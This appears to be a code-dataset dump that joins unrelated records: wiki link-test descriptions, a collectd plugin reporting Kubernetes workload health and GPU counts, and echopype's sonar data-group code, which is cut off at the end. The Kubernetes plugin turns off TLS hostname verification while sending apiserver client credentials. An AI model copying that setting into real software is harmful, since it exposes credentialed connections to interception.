Test ':en:wikipedia:Main Page' on enwp is namespace 4. Test ':en:wikipedia:Talk:Main Page' on enwp is namespace 4. Test link to a different family. Test ':en:wikipedia:Main Page' on enws is namespace 0. Test ':en:wikipedia:Main Page' on enwp is namespace 1. Test ':wikipedia:en:Main Page' on enws is namespace 0. Test ':wikipedia:en:Talk:Main Page' on enws is namespace 1. Test link from family without lang code to a different family. Test ':en:wikipedia:Main Page' on wikidata is namespace 4. Test ':en:wikipedia:Talk:Main Page' on wikidata is namespace 4. Test ':wikipedia:en:Main Page' on wikidata is namespace 0. Test ':wikipedia:en:Talk:Main Page' on wikidata is namespace 1. Test wikibase links. Test ':testwiki:wikidata:Q6' on enwp is namespace 0. Test ':testwiki:wikidata:Talk:Q6' on enwp is namespace 1. Test ':wikidata:testwiki:Q6' on enwp is namespace 0. Test ':wikidata:testwiki:Talk:Q6' on enwp is namespace 1. Test links to one site target family. Test ':species:species:Main Page' on species is namespace 0. Test ':species:species:Talk:Main Page' on species is namespace 1. # ---- Tests of a Link without colons, which shouldn't be interwikis, follow. Test partially qualified links to same site. Test 'wikipedia:Main Page' on enwp is namespace 4. Test 'wikipedia:Talk:Main Page' on enwp is namespace 4. Test 'en:Main Page' on enwp is namespace 0. Test 'en:Talk:Main Page' on enwp is namespace 1. Test partially qualified links to different code. Test 'en:Main Page' on dewp is namespace 0. Test 'en:Talk:Main Page' on dewp is namespace 1. Test partially qualified links to different family. Test 'wikipedia:Main Page' on enws is namespace 0. Test 'wikipedia:Talk:Main Page' on enws is ns 1. Link tests. Test 'en:wikipedia:Main Page' on enwp is namespace 4. Test 'en:wikipedia:Talk:Main Page' on enwp is namespace 4. Test link to a different family without preleading colon. Test 'en:wikipedia:Main Page' on enws is namespace 0. Test 'en:wikipedia:Main Page' on enws is namespace 1. 
Test 'wikipedia:en:Main Page' on enws is namespace 0. Test 'wikipedia:en:Talk:Main Page' on enws is namespace 1. Test implicit link from family without lang code to other family. Test 'en:wikipedia:Main Page' on wikidata is namespace 4. Test 'en:wikipedia:Talk:Main Page' on wikidata isn't namespace 1. Test 'wikipedia:en:Main Page' on wikidata is namespace 0. Test 'wikipedia:en:Talk:Main Page' on wikidata is namespace 1. Test wikibase links without preleading colon. Test 'testwiki:wikidata:Q6' on enwp is namespace 0. Test 'testwiki:wikidata:Talk:Q6' on enwp is namespace 1. Test 'wikidata:testwiki:Q6' on enwp is namespace 0. Test 'wikidata:testwiki:Talk:Q6' on enwp is namespace 1. Test links to one site target family without preleading colon. Test 'species:species:Main Page' on enwp is namespace 0. Test 'species:species:Talk:Main Page' on enwp is namespace 1. Test 'species:Main Page' on enwp is namespace 0. Test 'species:Talk:Main Page' on enwp is namespace 1. Test links which contain no title. Test that Link allow links without a title to the main page. Test that Link doesn't allow links without a title. Test that Link doesn't allow empty. Test that Link does only detect valid namespaces. Test links to non-wikis. Test that Link fails if the interwiki prefix is not a wiki. Test that Link fails if the interwiki prefix is a unknown family. Test parsing namespaces when creating SiteLinks. Test the separate contents of the link. Test parsing of title. # pragma: no cover
| 2.544282
| 3
|
src/docker-images/collectd/kubernetes_collectd.py
|
resouer/DLWorkspace
| 0
|
6627563
|
<gh_stars>0
#!/usr/bin/env python
import collectd
import json
import os
import subprocess
import sys
import yaml
import re
import pycurl
from StringIO import StringIO
import traceback
def curl_get(url):
    """GET *url* using the kube apiserver client cert/key; return the body."""
    curl = pycurl.Curl()
    curl.setopt(pycurl.URL, url)
    curl.setopt(pycurl.SSL_VERIFYPEER, 1)
    # NOTE(review): hostname verification is disabled (VERIFYHOST=0);
    # presumably the apiserver cert does not match the URL host --
    # confirm before tightening this to 2.
    curl.setopt(pycurl.SSL_VERIFYHOST, 0)
    curl.setopt(pycurl.CAINFO, "/etc/kubernetes/ssl/ca.pem")
    curl.setopt(pycurl.SSLKEYTYPE, "PEM")
    curl.setopt(pycurl.SSLKEY, "/etc/kubernetes/ssl/apiserver-key.pem")
    curl.setopt(pycurl.SSLCERTTYPE, "PEM")
    curl.setopt(pycurl.SSLCERT, "/etc/kubernetes/ssl/apiserver.pem")
    curl.setopt(curl.FOLLOWLOCATION, True)
    buff = StringIO()
    curl.setopt(pycurl.WRITEFUNCTION, buff.write)
    curl.perform()
    responseStr = buff.getvalue()
    curl.close()
    return responseStr
def configure(conf):
    """Collectd config callback; this plugin takes no options."""
    collectd.info('Configured with')
def _log_exception():
    """Log the currently handled exception through collectd's logger."""
    collectd.error("kubernetes plugin: %s" % traceback.format_exc())


def _status_number(status, key):
    """Return ``status[key]`` as a float, or 0 when the field is absent."""
    return float(status[key]) if key in status else 0


def _report_workloads(vl, path, kind,
                      available_key="availableReplicas",
                      desired_key="replicas",
                      ready_key="readyReplicas"):
    """Dispatch a 0/1 health gauge for every object listed at *path*.

    0 means healthy (desired == ready == available > 0), 1 degraded.
    *kind* only labels the log line; the ``*_key`` arguments name the
    status fields to read (daemonsets use different names).
    """
    listing = json.loads(curl_get(os.environ['K8SAPI'] + path))
    for obj in listing.get("items", []):
        if "metadata" not in obj or "name" not in obj["metadata"] \
                or "status" not in obj:
            continue
        status = obj["status"]
        name = obj["metadata"]["name"]
        available = _status_number(status, available_key)
        desired = _status_number(status, desired_key)
        ready = _status_number(status, ready_key)
        collectd.info('kubernetes plugin: %s "%s" with values: %f %f %f'
                      % (kind, name, desired, available, ready))
        healthy = desired > 0 and desired == ready == available
        vl.plugin_instance = name
        vl.dispatch(values=[0.0 if healthy else 1.0])


def read(data=None):
    """Collectd read callback.

    Reports one 'kubernetes' gauge per replicaset / replication
    controller / daemonset (0 = healthy, 1 = degraded), plus 'gpu'
    gauges 'usedgpu' (GPU requests of running pods) and 'totalgpu'
    (node capacity).  The API server base URL comes from $K8SAPI.
    Each section logs and swallows its own errors so one failing API
    call does not suppress the remaining metrics.
    """
    vl = collectd.Values(type='gauge')
    vl.plugin = 'kubernetes'
    try:
        _report_workloads(vl, "/apis/extensions/v1beta1/replicasets",
                          "replicaset")
        # Fix: replication controllers live in the core v1 API; the
        # previous path "/apis/extensions/v1/ReplicationController"
        # does not exist on any apiserver.
        _report_workloads(vl, "/api/v1/replicationcontrollers",
                          "ReplicationController")
        # Daemonset status uses its own field names; log label fixed
        # from the previous, misleading "deployment".
        _report_workloads(vl, "/apis/extensions/v1beta1/daemonsets",
                          "daemonset",
                          available_key="numberAvailable",
                          desired_key="desiredNumberScheduled",
                          ready_key="numberReady")
    except Exception:
        _log_exception()
    try:
        used_gpus = 0
        pods = json.loads(curl_get(os.environ['K8SAPI'] + "/api/v1/pods"))
        for item in pods.get("items", []):
            if "spec" not in item or "containers" not in item["spec"]:
                continue
            if item.get("status", {}).get("phase") != "Running":
                continue
            for container in item["spec"]["containers"]:
                requests = container.get("resources", {}).get("requests", {})
                if "alpha.kubernetes.io/nvidia-gpu" in requests:
                    used_gpus += int(requests["alpha.kubernetes.io/nvidia-gpu"])
        vl = collectd.Values(type='gauge')
        vl.plugin = 'gpu'
        vl.plugin_instance = "usedgpu"
        vl.dispatch(values=[float(used_gpus)])
    except Exception:
        _log_exception()
    try:
        total_gpus = 0
        nodes = json.loads(curl_get(os.environ['K8SAPI'] + "/api/v1/nodes"))
        for item in nodes.get("items", []):
            capacity = item.get("status", {}).get("capacity", {})
            if "alpha.kubernetes.io/nvidia-gpu" in capacity:
                total_gpus += int(capacity["alpha.kubernetes.io/nvidia-gpu"])
        vl = collectd.Values(type='gauge')
        vl.plugin = 'gpu'
        vl.plugin_instance = "totalgpu"
        vl.dispatch(values=[float(total_gpus)])
    except Exception:
        _log_exception()
# Hook the callbacks into the collectd plugin lifecycle.
collectd.register_config(configure)
collectd.register_read(read)
|
#!/usr/bin/env python
import collectd
import json
import os
import subprocess
import sys
import yaml
import re
import pycurl
from StringIO import StringIO
import traceback
def curl_get(url):
    """GET *url* using the kube apiserver client cert/key; return the body."""
    curl = pycurl.Curl()
    curl.setopt(pycurl.URL, url)
    curl.setopt(pycurl.SSL_VERIFYPEER, 1)
    # NOTE(review): hostname verification is disabled (VERIFYHOST=0);
    # presumably the apiserver cert does not match the URL host --
    # confirm before tightening this to 2.
    curl.setopt(pycurl.SSL_VERIFYHOST, 0)
    curl.setopt(pycurl.CAINFO, "/etc/kubernetes/ssl/ca.pem")
    curl.setopt(pycurl.SSLKEYTYPE, "PEM")
    curl.setopt(pycurl.SSLKEY, "/etc/kubernetes/ssl/apiserver-key.pem")
    curl.setopt(pycurl.SSLCERTTYPE, "PEM")
    curl.setopt(pycurl.SSLCERT, "/etc/kubernetes/ssl/apiserver.pem")
    curl.setopt(curl.FOLLOWLOCATION, True)
    buff = StringIO()
    curl.setopt(pycurl.WRITEFUNCTION, buff.write)
    curl.perform()
    responseStr = buff.getvalue()
    curl.close()
    return responseStr
def configure(conf):
    """Collectd config callback; this plugin takes no options."""
    collectd.info('Configured with')
def _log_exception():
    """Log the currently handled exception through collectd's logger."""
    collectd.error("kubernetes plugin: %s" % traceback.format_exc())


def _status_number(status, key):
    """Return ``status[key]`` as a float, or 0 when the field is absent."""
    return float(status[key]) if key in status else 0


def _report_workloads(vl, path, kind,
                      available_key="availableReplicas",
                      desired_key="replicas",
                      ready_key="readyReplicas"):
    """Dispatch a 0/1 health gauge for every object listed at *path*.

    0 means healthy (desired == ready == available > 0), 1 degraded.
    *kind* only labels the log line; the ``*_key`` arguments name the
    status fields to read (daemonsets use different names).
    """
    listing = json.loads(curl_get(os.environ['K8SAPI'] + path))
    for obj in listing.get("items", []):
        if "metadata" not in obj or "name" not in obj["metadata"] \
                or "status" not in obj:
            continue
        status = obj["status"]
        name = obj["metadata"]["name"]
        available = _status_number(status, available_key)
        desired = _status_number(status, desired_key)
        ready = _status_number(status, ready_key)
        collectd.info('kubernetes plugin: %s "%s" with values: %f %f %f'
                      % (kind, name, desired, available, ready))
        healthy = desired > 0 and desired == ready == available
        vl.plugin_instance = name
        vl.dispatch(values=[0.0 if healthy else 1.0])


def read(data=None):
    """Collectd read callback.

    Reports one 'kubernetes' gauge per replicaset / replication
    controller / daemonset (0 = healthy, 1 = degraded), plus 'gpu'
    gauges 'usedgpu' (GPU requests of running pods) and 'totalgpu'
    (node capacity).  The API server base URL comes from $K8SAPI.
    Each section logs and swallows its own errors so one failing API
    call does not suppress the remaining metrics.
    """
    vl = collectd.Values(type='gauge')
    vl.plugin = 'kubernetes'
    try:
        _report_workloads(vl, "/apis/extensions/v1beta1/replicasets",
                          "replicaset")
        # Fix: replication controllers live in the core v1 API; the
        # previous path "/apis/extensions/v1/ReplicationController"
        # does not exist on any apiserver.
        _report_workloads(vl, "/api/v1/replicationcontrollers",
                          "ReplicationController")
        # Daemonset status uses its own field names; log label fixed
        # from the previous, misleading "deployment".
        _report_workloads(vl, "/apis/extensions/v1beta1/daemonsets",
                          "daemonset",
                          available_key="numberAvailable",
                          desired_key="desiredNumberScheduled",
                          ready_key="numberReady")
    except Exception:
        _log_exception()
    try:
        used_gpus = 0
        pods = json.loads(curl_get(os.environ['K8SAPI'] + "/api/v1/pods"))
        for item in pods.get("items", []):
            if "spec" not in item or "containers" not in item["spec"]:
                continue
            if item.get("status", {}).get("phase") != "Running":
                continue
            for container in item["spec"]["containers"]:
                requests = container.get("resources", {}).get("requests", {})
                if "alpha.kubernetes.io/nvidia-gpu" in requests:
                    used_gpus += int(requests["alpha.kubernetes.io/nvidia-gpu"])
        vl = collectd.Values(type='gauge')
        vl.plugin = 'gpu'
        vl.plugin_instance = "usedgpu"
        vl.dispatch(values=[float(used_gpus)])
    except Exception:
        _log_exception()
    try:
        total_gpus = 0
        nodes = json.loads(curl_get(os.environ['K8SAPI'] + "/api/v1/nodes"))
        for item in nodes.get("items", []):
            capacity = item.get("status", {}).get("capacity", {})
            if "alpha.kubernetes.io/nvidia-gpu" in capacity:
                total_gpus += int(capacity["alpha.kubernetes.io/nvidia-gpu"])
        vl = collectd.Values(type='gauge')
        vl.plugin = 'gpu'
        vl.plugin_instance = "totalgpu"
        vl.dispatch(values=[float(total_gpus)])
    except Exception:
        _log_exception()
# Hook the callbacks into the collectd plugin lifecycle.
collectd.register_config(configure)
collectd.register_read(read)
|
ru
| 0.26433
|
#!/usr/bin/env python
| 2.067993
| 2
|
echopype/convert/set_groups_base.py
|
mbdunn/echopype
| 0
|
6627564
|
<reponame>mbdunn/echopype
import abc
from typing import Set
import numpy as np
import pynmea2
import xarray as xr
from ..echodata.convention import sonarnetcdf_1
from ..utils.coding import COMPRESSION_SETTINGS, set_encodings
from ..utils.prov import echopype_prov_attrs, source_files_vars
DEFAULT_CHUNK_SIZE = {"range_sample": 25000, "ping_time": 2500}
class SetGroupsBase(abc.ABC):
"""Base class for saving groups to netcdf or zarr from echosounder data files."""
def __init__(
self,
parser_obj,
input_file,
output_path,
sonar_model=None,
engine="zarr",
compress=True,
overwrite=True,
params=None,
):
# parser object ParseEK60/ParseAZFP/etc...
self.parser_obj = parser_obj
# Used for when a sonar that is not AZFP/EK60/EK80 can still be saved
self.sonar_model = sonar_model
self.input_file = input_file
self.output_path = output_path
self.engine = engine
self.compress = compress
self.overwrite = overwrite
self.ui_param = params
if not self.compress:
self.compression_settings = None
else:
self.compression_settings = COMPRESSION_SETTINGS[self.engine]
self._varattrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"]
# self._beamgroups must be a list of dicts, eg:
# [{"name":"Beam_group1", "descr":"contains complex backscatter data
# and other beam or channel-specific data."}]
self._beamgroups = []
# TODO: change the set_XXX methods to return a dataset to be saved
# in the overarching save method
def set_toplevel(self, sonar_model, date_created=None) -> xr.Dataset:
"""Set the top-level group."""
# Collect variables
tl_dict = {
"conventions": "CF-1.7, SONAR-netCDF4-1.0, ACDD-1.3",
"keywords": sonar_model,
"sonar_convention_authority": "ICES",
"sonar_convention_name": "SONAR-netCDF4",
"sonar_convention_version": "1.0",
"summary": "",
"title": "",
"date_created": np.datetime_as_string(date_created, "s") + "Z",
"survey_name": self.ui_param["survey_name"],
}
# Save
ds = xr.Dataset()
ds = ds.assign_attrs(tl_dict)
return ds
def set_provenance(self) -> xr.Dataset:
"""Set the Provenance group."""
prov_dict = echopype_prov_attrs(process_type="conversion")
ds = xr.Dataset(source_files_vars(self.input_file))
ds = ds.assign_attrs(prov_dict)
return ds
@abc.abstractmethod
def set_env(self) -> xr.Dataset:
"""Set the Environment group."""
raise NotImplementedError
@abc.abstractmethod
def set_sonar(self) -> xr.Dataset:
"""Set the Sonar group."""
raise NotImplementedError
@abc.abstractmethod
def set_beam(self) -> xr.Dataset:
"""Set the /Sonar/Beam group."""
raise NotImplementedError
@abc.abstractmethod
def set_platform(self) -> xr.Dataset:
"""Set the Platform group."""
raise NotImplementedError
def set_nmea(self) -> xr.Dataset:
"""Set the Platform/NMEA group."""
# Save nan if nmea data is not encoded in the raw file
if len(self.parser_obj.nmea["nmea_string"]) != 0:
# Convert np.datetime64 numbers to seconds since 1900-01-01 00:00:00Z
# due to xarray.to_netcdf() error on encoding np.datetime64 objects directly
time = (
self.parser_obj.nmea["timestamp"] - np.datetime64("1900-01-01T00:00:00")
) / np.timedelta64(1, "s")
raw_nmea = self.parser_obj.nmea["nmea_string"]
else:
time = [np.nan]
raw_nmea = [np.nan]
ds = xr.Dataset(
{
"NMEA_datagram": (
["time1"],
raw_nmea,
{"long_name": "NMEA datagram"},
)
},
coords={
"time1": (
["time1"],
time,
{
"axis": "T",
"long_name": "Timestamps for NMEA datagrams",
"standard_name": "time",
"comment": "Time coordinate corresponding to NMEA sensor data.",
},
)
},
attrs={"description": "All NMEA sensor datagrams"},
)
return set_encodings(ds)
@abc.abstractmethod
def set_vendor(self) -> xr.Dataset:
"""Set the Vendor_specific group."""
raise NotImplementedError
# TODO: move this to be part of parser as it is not a "set" operation
def _parse_NMEA(self):
"""Get the lat and lon values from the raw nmea data"""
messages = [string[3:6] for string in self.parser_obj.nmea["nmea_string"]]
idx_loc = np.argwhere(np.isin(messages, self.ui_param["nmea_gps_sentence"])).squeeze()
if idx_loc.size == 1: # in case of only 1 matching message
idx_loc = np.expand_dims(idx_loc, axis=0)
nmea_msg = []
for x in idx_loc:
try:
nmea_msg.append(pynmea2.parse(self.parser_obj.nmea["nmea_string"][x]))
except (
pynmea2.ChecksumError,
pynmea2.SentenceTypeError,
AttributeError,
pynmea2.ParseError,
):
nmea_msg.append(None)
lat = (
np.array([x.latitude if hasattr(x, "latitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
lon = (
np.array([x.longitude if hasattr(x, "longitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
msg_type = (
np.array([x.sentence_type if hasattr(x, "sentence_type") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
time1 = (
(
np.array(self.parser_obj.nmea["timestamp"])[idx_loc]
- np.datetime64("1900-01-01T00:00:00")
)
/ np.timedelta64(1, "s")
if nmea_msg
else [np.nan]
)
return time1, msg_type, lat, lon
def _beam_groups_vars(self):
"""Stage beam_group coordinate and beam_group_descr variables sharing
a common dimension, beam_group, to be inserted in the Sonar group"""
beam_groups_vars = {
"beam_group_descr": (
["beam_group"],
[di["descr"] for di in self._beamgroups],
{"long_name": "Beam group description"},
),
}
beam_groups_coord = {
"beam_group": (
["beam_group"],
[di["name"] for di in self._beamgroups],
{"long_name": "Beam group name"},
),
}
return beam_groups_vars, beam_groups_coord
@staticmethod
def _add_beam_dim(ds: xr.Dataset, beam_only_names: Set[str], beam_ping_time_names: Set[str]):
"""
Adds ``beam`` as the last dimension to the appropriate
variables in ``Sonar/Beam_groupX`` groups when necessary.
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``beam``
it is necessary to use .assign_coords() with ``beam``
from ds.
"""
# variables to add beam to
add_beam_names = set(ds.variables).intersection(beam_only_names.union(beam_ping_time_names))
for var_name in add_beam_names:
if "beam" in ds.dims:
if "beam" not in ds[var_name].dims:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": ds.beam}, axis=ds[var_name].ndim)
.assign_coords(beam=ds.beam)
.copy()
)
else:
# Add a single-value beam dimension and its attributes
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": np.array(["1"], dtype=str)}, axis=ds[var_name].ndim)
.copy()
)
ds[var_name].beam.attrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"][
"beam_coord_default"
]["beam"]
@staticmethod
def _add_ping_time_dim(
ds: xr.Dataset, beam_ping_time_names: Set[str], ping_time_only_names: Set[str]
):
"""
Adds ``ping_time`` as the last dimension to the appropriate
variables in ``Sonar/Beam_group1`` and ``Sonar/Beam_group2``
(when necessary).
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``ping_time``
it is necessary to use .assign_coords() with ``ping_time``
from ds.
"""
# variables to add ping_time to
add_ping_time_names = (
set(ds.variables).intersection(beam_ping_time_names).union(ping_time_only_names)
)
for var_name in add_ping_time_names:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"ping_time": ds.ping_time}, axis=ds[var_name].ndim)
.assign_coords(ping_time=ds.ping_time)
.copy()
)
def beam_groups_to_convention(
self,
ds: xr.Dataset,
beam_only_names: Set[str],
beam_ping_time_names: Set[str],
ping_time_only_names: Set[str],
):
"""
Manipulates variables in ``Sonar/Beam_groupX``
to adhere to SONAR-netCDF4 vers. 1 with respect
to the use of ``ping_time`` and ``beam`` dimensions.
This does several things:
1. Creates ``beam`` dimension and coordinate variable
when not present.
2. Adds ``beam`` dimension to several variables
when missing.
3. Adds ``ping_time`` dimension to several variables
when missing.
Parameters
----------
ds : xr.Dataset
Dataset corresponding to ``Beam_groupX``.
beam_only_names : Set[str]
Variables that need only the beam dimension added to them.
beam_ping_time_names : Set[str]
Variables that need beam and ping_time dimensions added to them.
ping_time_only_names : Set[str]
Variables that need only the ping_time dimension added to them.
"""
self._add_ping_time_dim(ds, beam_ping_time_names, ping_time_only_names)
self._add_beam_dim(ds, beam_only_names, beam_ping_time_names)
|
import abc
from typing import Set
import numpy as np
import pynmea2
import xarray as xr
from ..echodata.convention import sonarnetcdf_1
from ..utils.coding import COMPRESSION_SETTINGS, set_encodings
from ..utils.prov import echopype_prov_attrs, source_files_vars
DEFAULT_CHUNK_SIZE = {"range_sample": 25000, "ping_time": 2500}
class SetGroupsBase(abc.ABC):
"""Base class for saving groups to netcdf or zarr from echosounder data files."""
def __init__(
self,
parser_obj,
input_file,
output_path,
sonar_model=None,
engine="zarr",
compress=True,
overwrite=True,
params=None,
):
# parser object ParseEK60/ParseAZFP/etc...
self.parser_obj = parser_obj
# Used for when a sonar that is not AZFP/EK60/EK80 can still be saved
self.sonar_model = sonar_model
self.input_file = input_file
self.output_path = output_path
self.engine = engine
self.compress = compress
self.overwrite = overwrite
self.ui_param = params
if not self.compress:
self.compression_settings = None
else:
self.compression_settings = COMPRESSION_SETTINGS[self.engine]
self._varattrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"]
# self._beamgroups must be a list of dicts, eg:
# [{"name":"Beam_group1", "descr":"contains complex backscatter data
# and other beam or channel-specific data."}]
self._beamgroups = []
# TODO: change the set_XXX methods to return a dataset to be saved
# in the overarching save method
def set_toplevel(self, sonar_model, date_created=None) -> xr.Dataset:
"""Set the top-level group."""
# Collect variables
tl_dict = {
"conventions": "CF-1.7, SONAR-netCDF4-1.0, ACDD-1.3",
"keywords": sonar_model,
"sonar_convention_authority": "ICES",
"sonar_convention_name": "SONAR-netCDF4",
"sonar_convention_version": "1.0",
"summary": "",
"title": "",
"date_created": np.datetime_as_string(date_created, "s") + "Z",
"survey_name": self.ui_param["survey_name"],
}
# Save
ds = xr.Dataset()
ds = ds.assign_attrs(tl_dict)
return ds
def set_provenance(self) -> xr.Dataset:
"""Set the Provenance group."""
prov_dict = echopype_prov_attrs(process_type="conversion")
ds = xr.Dataset(source_files_vars(self.input_file))
ds = ds.assign_attrs(prov_dict)
return ds
@abc.abstractmethod
def set_env(self) -> xr.Dataset:
"""Set the Environment group."""
raise NotImplementedError
@abc.abstractmethod
def set_sonar(self) -> xr.Dataset:
"""Set the Sonar group."""
raise NotImplementedError
@abc.abstractmethod
def set_beam(self) -> xr.Dataset:
"""Set the /Sonar/Beam group."""
raise NotImplementedError
@abc.abstractmethod
def set_platform(self) -> xr.Dataset:
"""Set the Platform group."""
raise NotImplementedError
def set_nmea(self) -> xr.Dataset:
"""Set the Platform/NMEA group."""
# Save nan if nmea data is not encoded in the raw file
if len(self.parser_obj.nmea["nmea_string"]) != 0:
# Convert np.datetime64 numbers to seconds since 1900-01-01 00:00:00Z
# due to xarray.to_netcdf() error on encoding np.datetime64 objects directly
time = (
self.parser_obj.nmea["timestamp"] - np.datetime64("1900-01-01T00:00:00")
) / np.timedelta64(1, "s")
raw_nmea = self.parser_obj.nmea["nmea_string"]
else:
time = [np.nan]
raw_nmea = [np.nan]
ds = xr.Dataset(
{
"NMEA_datagram": (
["time1"],
raw_nmea,
{"long_name": "NMEA datagram"},
)
},
coords={
"time1": (
["time1"],
time,
{
"axis": "T",
"long_name": "Timestamps for NMEA datagrams",
"standard_name": "time",
"comment": "Time coordinate corresponding to NMEA sensor data.",
},
)
},
attrs={"description": "All NMEA sensor datagrams"},
)
return set_encodings(ds)
@abc.abstractmethod
def set_vendor(self) -> xr.Dataset:
"""Set the Vendor_specific group."""
raise NotImplementedError
# TODO: move this to be part of parser as it is not a "set" operation
def _parse_NMEA(self):
"""Get the lat and lon values from the raw nmea data"""
messages = [string[3:6] for string in self.parser_obj.nmea["nmea_string"]]
idx_loc = np.argwhere(np.isin(messages, self.ui_param["nmea_gps_sentence"])).squeeze()
if idx_loc.size == 1: # in case of only 1 matching message
idx_loc = np.expand_dims(idx_loc, axis=0)
nmea_msg = []
for x in idx_loc:
try:
nmea_msg.append(pynmea2.parse(self.parser_obj.nmea["nmea_string"][x]))
except (
pynmea2.ChecksumError,
pynmea2.SentenceTypeError,
AttributeError,
pynmea2.ParseError,
):
nmea_msg.append(None)
lat = (
np.array([x.latitude if hasattr(x, "latitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
lon = (
np.array([x.longitude if hasattr(x, "longitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
msg_type = (
np.array([x.sentence_type if hasattr(x, "sentence_type") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
time1 = (
(
np.array(self.parser_obj.nmea["timestamp"])[idx_loc]
- np.datetime64("1900-01-01T00:00:00")
)
/ np.timedelta64(1, "s")
if nmea_msg
else [np.nan]
)
return time1, msg_type, lat, lon
def _beam_groups_vars(self):
"""Stage beam_group coordinate and beam_group_descr variables sharing
a common dimension, beam_group, to be inserted in the Sonar group"""
beam_groups_vars = {
"beam_group_descr": (
["beam_group"],
[di["descr"] for di in self._beamgroups],
{"long_name": "Beam group description"},
),
}
beam_groups_coord = {
"beam_group": (
["beam_group"],
[di["name"] for di in self._beamgroups],
{"long_name": "Beam group name"},
),
}
return beam_groups_vars, beam_groups_coord
@staticmethod
def _add_beam_dim(ds: xr.Dataset, beam_only_names: Set[str], beam_ping_time_names: Set[str]):
"""
Adds ``beam`` as the last dimension to the appropriate
variables in ``Sonar/Beam_groupX`` groups when necessary.
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``beam``
it is necessary to use .assign_coords() with ``beam``
from ds.
"""
# variables to add beam to
add_beam_names = set(ds.variables).intersection(beam_only_names.union(beam_ping_time_names))
for var_name in add_beam_names:
if "beam" in ds.dims:
if "beam" not in ds[var_name].dims:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": ds.beam}, axis=ds[var_name].ndim)
.assign_coords(beam=ds.beam)
.copy()
)
else:
# Add a single-value beam dimension and its attributes
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": np.array(["1"], dtype=str)}, axis=ds[var_name].ndim)
.copy()
)
ds[var_name].beam.attrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"][
"beam_coord_default"
]["beam"]
@staticmethod
def _add_ping_time_dim(
ds: xr.Dataset, beam_ping_time_names: Set[str], ping_time_only_names: Set[str]
):
"""
Adds ``ping_time`` as the last dimension to the appropriate
variables in ``Sonar/Beam_group1`` and ``Sonar/Beam_group2``
(when necessary).
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``ping_time``
it is necessary to use .assign_coords() with ``ping_time``
from ds.
"""
# variables to add ping_time to
add_ping_time_names = (
set(ds.variables).intersection(beam_ping_time_names).union(ping_time_only_names)
)
for var_name in add_ping_time_names:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"ping_time": ds.ping_time}, axis=ds[var_name].ndim)
.assign_coords(ping_time=ds.ping_time)
.copy()
)
def beam_groups_to_convention(
self,
ds: xr.Dataset,
beam_only_names: Set[str],
beam_ping_time_names: Set[str],
ping_time_only_names: Set[str],
):
"""
Manipulates variables in ``Sonar/Beam_groupX``
to adhere to SONAR-netCDF4 vers. 1 with respect
to the use of ``ping_time`` and ``beam`` dimensions.
This does several things:
1. Creates ``beam`` dimension and coordinate variable
when not present.
2. Adds ``beam`` dimension to several variables
when missing.
3. Adds ``ping_time`` dimension to several variables
when missing.
Parameters
----------
ds : xr.Dataset
Dataset corresponding to ``Beam_groupX``.
beam_only_names : Set[str]
Variables that need only the beam dimension added to them.
beam_ping_time_names : Set[str]
Variables that need beam and ping_time dimensions added to them.
ping_time_only_names : Set[str]
Variables that need only the ping_time dimension added to them.
"""
self._add_ping_time_dim(ds, beam_ping_time_names, ping_time_only_names)
self._add_beam_dim(ds, beam_only_names, beam_ping_time_names)
|
en
| 0.735876
|
Base class for saving groups to netcdf or zarr from echosounder data files. # parser object ParseEK60/ParseAZFP/etc... # Used for when a sonar that is not AZFP/EK60/EK80 can still be saved # self._beamgroups must be a list of dicts, eg: # [{"name":"Beam_group1", "descr":"contains complex backscatter data # and other beam or channel-specific data."}] # TODO: change the set_XXX methods to return a dataset to be saved # in the overarching save method Set the top-level group. # Collect variables # Save Set the Provenance group. Set the Environment group. Set the Sonar group. Set the /Sonar/Beam group. Set the Platform group. Set the Platform/NMEA group. # Save nan if nmea data is not encoded in the raw file # Convert np.datetime64 numbers to seconds since 1900-01-01 00:00:00Z # due to xarray.to_netcdf() error on encoding np.datetime64 objects directly Set the Vendor_specific group. # TODO: move this to be part of parser as it is not a "set" operation Get the lat and lon values from the raw nmea data # in case of only 1 matching message Stage beam_group coordinate and beam_group_descr variables sharing a common dimension, beam_group, to be inserted in the Sonar group Adds ``beam`` as the last dimension to the appropriate variables in ``Sonar/Beam_groupX`` groups when necessary. Notes ----- When expanding the dimension of a Dataarray, it is necessary to copy the array (hence the .copy()). This allows the array to be writable downstream (i.e. we can assign values to certain indices). To retain the attributes and encoding of ``beam`` it is necessary to use .assign_coords() with ``beam`` from ds. # variables to add beam to # Add a single-value beam dimension and its attributes Adds ``ping_time`` as the last dimension to the appropriate variables in ``Sonar/Beam_group1`` and ``Sonar/Beam_group2`` (when necessary). Notes ----- When expanding the dimension of a Dataarray, it is necessary to copy the array (hence the .copy()). 
